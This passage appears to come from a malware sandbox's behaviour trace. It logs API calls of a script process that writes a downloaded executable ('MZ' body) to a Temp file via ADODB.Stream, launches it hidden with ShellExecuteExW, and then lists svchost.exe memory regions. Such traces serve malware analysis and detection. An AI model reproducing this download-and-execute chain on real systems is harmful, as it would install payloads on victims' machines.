pVarResult=0x2bbcd0*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="MZ￿", varVal2=0x2bb210), pExcepInfo=0x18c820*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18c814*=0x57fe) returned 0x0 [0034.698] IUnknown:Release (This=0x58e5aa0) returned 0x1 [0034.699] GetTickCount () returned 0x18545 [0034.711] CLSIDFromProgIDEx (in: lpszProgID="ADODB.Stream", lpclsid=0x18c920 | out: lpclsid=0x18c920*(Data1=0x566, Data2=0x0, Data3=0x10, Data4=([0]=0x80, [1]=0x0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x6d, [6]=0x2e, [7]=0xa4))) returned 0x0 [0034.712] SysStringLen (param_1=0x0) returned 0x0 [0034.712] CoGetClassObject (in: rclsid=0x18c920*(Data1=0x566, Data2=0x0, Data3=0x10, Data4=([0]=0x80, [1]=0x0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x6d, [6]=0x2e, [7]=0xa4)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef3086300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c8f0 | out: ppv=0x18c8f0*=0xc461370) returned 0x0 [0034.770] Stream:IUnknown:QueryInterface (in: This=0xc461370, riid=0x7fef3086310*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x18c8f8 | out: ppvObject=0x18c8f8*=0x0) returned 0x80004002 [0034.770] Stream:IClassFactory:CreateInstance (in: This=0xc461370, pUnkOuter=0x0, riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18c8e0 | out: ppvObject=0x18c8e0*=0xc461400) returned 0x0 [0034.772] Stream:IUnknown:Release (This=0xc461370) returned 0x1 [0034.772] IUnknown:QueryInterface (in: This=0xc461400, riid=0x7fef3086320*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x18c8c0 | out: ppvObject=0x18c8c0*=0xc461460) returned 0x0 [0034.772] IObjectWithSite:SetSite (This=0xc461460, pUnkSite=0x4caf1d0) returned 0x0 [0034.772] IUnknown:QueryInterface (in: This=0x4caf1d0, riid=0x7fefe71d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18c6f8 | out: ppvObject=0x18c6f8*=0x0) returned 0x80004002 [0034.772] IUnknown:QueryInterface (in: This=0x4caf1d0, riid=0x7fefe6f6f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18c700 | out: ppvObject=0x18c700*=0x0) returned 0x80004002 [0034.772] IUnknown:AddRef (This=0x4caf1d0) returned 0x2 [0034.772] IUnknown:QueryInterface (in: This=0x4caf1d0, riid=0x7fef34df728*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18c808 | out: ppvObject=0x18c808*=0x0) returned 0x80004002 [0034.772] IUnknown:QueryInterface (in: This=0x4caf1d0, riid=0x7fef34df778*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x18c810 | out: ppvObject=0x18c810*=0x4caf1d0) returned 0x0 [0034.773] IServiceProvider:QueryService (in: This=0x4caf1d0, guidService=0x7fef34df788*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef3504e80, ppvObject=0x18c858 | out: ppvObject=0x18c858*=0x0) returned 0x80004002 [0034.773] IUnknown:Release (This=0x4caf1d0) returned 0x2 [0034.773] IUnknown:QueryInterface (in: This=0x4caf1d0, riid=0x7fef34df778*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x18c800 | out: ppvObject=0x18c800*=0x4caf1d0) returned 0x0 [0034.773] IServiceProvider:QueryService (in: This=0x4caf1d0, guidService=0x7fef34df7a8*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef34df7a8*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x18c818 | out: ppvObject=0x18c818*=0x0) returned 0x80004002 [0034.773] IUnknown:Release (This=0x4caf1d0) returned 0x2 [0034.773] IUnknown:Release (This=0xc461460) returned 0x1 [0034.773] IUnknown:QueryInterface (in: This=0xc461400, riid=0x7fef3086370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18c898 | out: ppvObject=0x18c898*=0x0) returned 0x80004002 [0034.773] IUnknown:QueryInterface (in: This=0xc461400, riid=0x7fef3086518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18c810 | out: ppvObject=0x18c810*=0x0) returned 0x80004002 [0034.773] IUnknown:QueryInterface (in: This=0xc461400, riid=0x7fef30864f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18c818 | out: ppvObject=0x18c818*=0x0) returned 0x80004002 [0034.773] IUnknown:QueryInterface (in: This=0xc461400, riid=0x7fef3086508*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x18c820 | out: ppvObject=0x18c820*=0x0) returned 0x80004002 [0034.773] IUnknown:QueryInterface (in: This=0xc461400, riid=0x7fef3086340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18c828 | out: ppvObject=0x18c828*=0xc461400) returned 0x0 [0034.773] IUnknown:Release (This=0xc461400) returned 0x1 [0034.773] IDispatch:GetIDsOfNames (in: This=0xc461400, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18ca70*="open", cNames=0x1, lcid=0x409, rgDispId=0x18c920 | out: rgDispId=0x18c920*=10) returned 0x0 [0034.774] IUnknown:AddRef (This=0xc461400) returned 0x2 [0034.774] IDispatch:Invoke (in: This=0xc461400, dispIdMember=10, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x18c808*(rgvarg=0x2bbce8, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x18c7b0, puArgErr=0x18c7a4 | out: pDispParams=0x18c808*(rgvarg=0x2bbce8, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x18c7b0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18c7a4*=0x0) returned 0x0 [0034.775] IUnknown:Release (This=0xc461400) returned 0x1 [0034.775] IDispatch:GetIDsOfNames (in: This=0xc461400, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18cae0*="type", cNames=0x1, lcid=0x409, rgDispId=0x18c990 | out: rgDispId=0x18c990*=4) returned 0x0 [0034.776] IUnknown:AddRef (This=0xc461400) returned 0x2 [0034.776] IDispatch:Invoke (in: This=0xc461400, dispIdMember=4, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x4, pDispParams=0x18c878*(rgvarg=([0]=0x2bbcb8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0)), rgdispidNamedArgs=([0]=0x18c870*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x18c820, puArgErr=0x18c814 | out: pDispParams=0x18c878*(rgvarg=([0]=0x2bbcb8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0)), rgdispidNamedArgs=([0]=0x18c870*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x18c820*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18c814*=0x0) returned 0x0 [0034.776] IUnknown:Release (This=0xc461400) returned 0x1 [0034.776] GetTickCount () returned 0x18593 [0034.787] IDispatch:GetIDsOfNames (in: This=0x58e5aa0, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18cae0*="ResponseBody", cNames=0x1, lcid=0x409, rgDispId=0x18c990 | out: rgDispId=0x18c990*=11) returned 0x0 [0034.787] IUnknown:AddRef (This=0x58e5aa0) returned 0x2 [0034.787] IDispatch:Invoke (in: This=0x58e5aa0, dispIdMember=11, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x18c878*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2bbcd0, pExcepInfo=0x18c820, puArgErr=0x18c814 | out: pDispParams=0x18c878*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2bbcd0*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x95aff60*(cDims=0x1, fFeatures=0x2080, cbElements=0x1, cLocks=0x0, pvData=0x95aff80*, rgsabound=((cElements=0x7e600, lLbound=0))), varVal2=0x0), pExcepInfo=0x18c820*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18c814*=0x57fe) returned 0x0 [0034.788] IUnknown:Release (This=0x58e5aa0) returned 0x1 [0034.788] IDispatch:GetIDsOfNames (in: This=0xc461400, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18ca70*="write", cNames=0x1, lcid=0x409, rgDispId=0x18c920 | out: rgDispId=0x18c920*=13) returned 0x0 [0034.788] IUnknown:AddRef (This=0xc461400) returned 0x2 [0034.788] IDispatch:Invoke (in: This=0xc461400, dispIdMember=13, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x18c808*(rgvarg=([0]=0x18c820*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x95aff60*(cDims=0x1, fFeatures=0x2080, cbElements=0x1, cLocks=0x0, pvData=0x95aff80*, rgsabound=((cElements=0x7e600, lLbound=0))), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x18c7b0, puArgErr=0x18c7a4 | out: pDispParams=0x18c808*(rgvarg=([0]=0x18c820*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x95aff60*(cDims=0x1, fFeatures=0x2080, cbElements=0x1, cLocks=0x0, pvData=0x95aff80*, rgsabound=((cElements=0x7e600, lLbound=0))), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x18c7b0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18c7a4*=0x0) returned 0x0 [0034.802] IUnknown:Release (This=0xc461400) returned 0x1 [0034.802] IDispatch:GetIDsOfNames (in: This=0xc461400, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18cae0*="position", cNames=0x1, lcid=0x409, rgDispId=0x18c990 | out: rgDispId=0x18c990*=3) returned 0x0 [0034.803] IUnknown:AddRef (This=0xc461400) returned 0x2 [0034.803] IDispatch:Invoke (in: This=0xc461400, dispIdMember=3, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x4, pDispParams=0x18c878*(rgvarg=([0]=0x2bbcb8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)), rgdispidNamedArgs=([0]=0x18c870*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x18c820, puArgErr=0x18c814 | out: pDispParams=0x18c878*(rgvarg=([0]=0x2bbcb8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)), rgdispidNamedArgs=([0]=0x18c870*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x18c820*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18c814*=0x0) returned 0x0 [0034.803] IUnknown:Release (This=0xc461400) returned 0x1 [0034.803] GetTickCount () returned 0x185b2 [0034.813] IDispatch:GetIDsOfNames (in: This=0xc461400, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18ca70*="saveToFile", cNames=0x1, lcid=0x409, rgDispId=0x18c920 | out: rgDispId=0x18c920*=17) returned 0x0 [0034.813] IUnknown:AddRef (This=0xc461400) returned 0x2 [0034.813] IDispatch:Invoke (in: This=0xc461400, dispIdMember=17, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x18c808*(rgvarg=([0]=0x18c820*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), [1]=0x18c838*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/pST790mv.exe", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x18c7b0, puArgErr=0x18c7a4 | out: pDispParams=0x18c808*(rgvarg=([0]=0x18c820*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), [1]=0x18c838*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/pST790mv.exe", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x18c7b0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18c7a4*=0x0) returned 0x0 [0034.814] IUnknown:QueryInterface (in: This=0x4caf1d0, riid=0x7fef34d50c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18b850 | out: ppvObject=0x18b850*=0x4caf1d0) returned 0x0 [0034.814] IUnknown:QueryInterface (in: This=0x4caf1d0, riid=0x7fef34d50c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18b8f0 | out: ppvObject=0x18b8f0*=0x4caf1d0) returned 0x0 [0034.814] IUnknown:Release (This=0x4caf1d0) returned 0x2 [0034.832] IUnknown:Release (This=0x4caf1d0) returned 0x1 [0034.832] IUnknown:Release (This=0xc461400) returned 0x1 [0034.833] IDispatch:GetIDsOfNames (in: This=0xc461400, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18ca70*="close", cNames=0x1, lcid=0x409, rgDispId=0x18c920 | out: rgDispId=0x18c920*=11) returned 0x0 [0034.833] IUnknown:AddRef (This=0xc461400) returned 0x2 [0034.833] IDispatch:Invoke (in: This=0xc461400, dispIdMember=11, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x18c808*(rgvarg=0x2bbce8, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x18c7b0, puArgErr=0x18c7a4 | out: pDispParams=0x18c808*(rgvarg=0x2bbce8, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x18c7b0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18c7a4*=0x0) returned 0x0 [0034.833] IUnknown:Release (This=0xc461400) returned 0x1 [0034.833] ITypeInfo:LocalGetIDsOfNames (This=0x383d4e0) returned 0x0 [0034.833] IUnknown:Release (This=0x383d4e0) returned 0x1 [0034.833] ITypeInfo:LocalInvoke (This=0x383d4e0) returned 0x0 [0034.833] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/pST790mv.exe", lpDst=0x18b1b0, nSize=0x400 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/pST790mv.exe") returned 0x32 [0034.833] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x7fefd450000 [0034.833] GetProcAddress (hModule=0x7fefd450000, lpProcName="ShellExecuteExW") returned 0x7fefd477c70 [0034.834] ShellExecuteExW (in: pExecInfo=0x18b960*(cbSize=0x70, fMask=0x440, hwnd=0x0, lpVerb="Open", lpFile="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/pST790mv.exe", lpParameters=0x0, lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18b960*(cbSize=0x70, fMask=0x440, hwnd=0x0, lpVerb="Open", lpFile="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/pST790mv.exe", lpParameters=0x0, lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x2bc)) returned 1 [0035.305] CloseHandle (hObject=0x2bc) returned 1 [0035.305] IUnknown:Release (This=0x383d4e0) returned 0x1 [0035.305] GetCurrentThreadId () returned 0x9ac [0036.285] GetUserDefaultLCID () returned 0x409 [0036.285] GetACP () returned 0x4e4 [0036.285] SendMessageA (hWnd=0x6012c, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0 [0036.285] SendMessageA (hWnd=0x6012c, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0 [0036.286] PostMessageA (hWnd=0x6012c, Msg=0x12, wParam=0x0, lParam=0x0) returned 1 [0036.287] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x18f360*=0xe0, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0 [0036.287] CloseHandle (hObject=0xe0) returned 1 [0036.287] DllCanUnloadNow () Thread: id = 2 os_tid = 0x9c0 Thread: id = 3 os_tid = 0x9c4 [0013.307] GetClassInfoA (in: hInstance=0xffa20000, lpClassName="WSH-Timer", lpWndClass=0x24ff880 | out: lpWndClass=0x24ff880) returned 0 [0013.308] RegisterClassA (lpWndClass=0x24ff880) returned 0x9006ac13f [0013.308] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0xffa20000, lpParam=0x2b5910) returned 0x6012c [0013.308] GetWindowLongPtrA (hWnd=0x6012c, nIndex=-21) returned 0x0 [0013.308] NtdllDefWindowProc_A (hWnd=0x6012c, Msg=0x24, wParam=0x0, lParam=0x24ff270) returned 0x0 [0013.308] GetWindowLongPtrA (hWnd=0x6012c, nIndex=-21) returned 0x0 [0013.308] SetWindowLongPtrA (hWnd=0x6012c, nIndex=-21, dwNewLong=0x2b5910) returned 0x0 [0013.308] NtdllDefWindowProc_A (hWnd=0x6012c, Msg=0x81, wParam=0x0, lParam=0x24ff230) returned 0x1 [0013.309] GetWindowLongPtrA (hWnd=0x6012c, nIndex=-21) returned 0x2b5910 [0013.309] NtdllDefWindowProc_A (hWnd=0x6012c, Msg=0x83, wParam=0x0, lParam=0x24ff290) returned 0x0 [0013.321] GetWindowLongPtrA (hWnd=0x6012c, nIndex=-21) returned 0x2b5910 [0013.321] NtdllDefWindowProc_A (hWnd=0x6012c, Msg=0x1, wParam=0x0, lParam=0x24ff230) returned 0x0 [0013.322] SetEvent (hEvent=0xd8) returned 1 [0013.322] GetMessageA (in: lpMsg=0x24ff850, hWnd=0x6012c, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x24ff850) returned 0 [0036.285] GetWindowLongPtrA (hWnd=0x6012c, nIndex=-21) returned 0x2b5910 [0036.286] GetWindowLongPtrA (hWnd=0x6012c, nIndex=-21) returned 0x2b5910 Thread: id = 4 os_tid = 0x9c8 Thread: id = 5 os_tid = 0x9cc Thread: id = 6 os_tid = 0x9d0 Thread: id = 7 os_tid = 0x9d4 Thread: id = 8 os_tid = 0x9d8 Thread: id = 9 os_tid = 0x9e8 Thread: id = 10 os_tid = 0x9ec Thread: id = 11 os_tid = 0x9f8 Thread: id = 28 os_tid = 0xa10 Thread: id = 29 os_tid = 0xa14 Thread: id = 31 os_tid = 0xaa0 Thread: id = 32 os_tid = 0xaa4 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x169e7000" os_pid = "0x3d8" os_integrity_level = "0x4000" os_privileges = "0x60801000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x9a8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c74c" [0xc000000f], "LOCAL" [0x7] Region: id = 319 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 320 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 321 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 322 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 323 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 324 start_va = 0xc0000 end_va = 0x17ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 325 start_va = 0x180000 end_va = 0x181fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 326 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 327 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 328 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 329 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 330 start_va = 0x2c0000 end_va = 0x2d0fff entry_point = 0x2c0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 331 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 332 start_va = 0x2f0000 end_va = 0x2f3fff entry_point = 0x2f0000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 333 start_va = 0x300000 end_va = 0x301fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 334 start_va = 0x310000 end_va = 